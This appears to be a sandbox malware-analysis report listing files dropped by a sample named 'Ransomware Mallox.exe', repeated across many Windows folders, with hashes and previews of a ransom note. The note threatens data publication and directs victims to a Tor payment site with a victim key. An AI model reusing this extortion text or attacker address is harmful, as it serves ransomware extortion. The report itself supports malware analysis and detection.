                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\PlaceholderTileLogoFolder\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Publishers\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\SolidDocuments\Acrobat\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\SolidDocuments\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Diagnostics\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Symbols\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
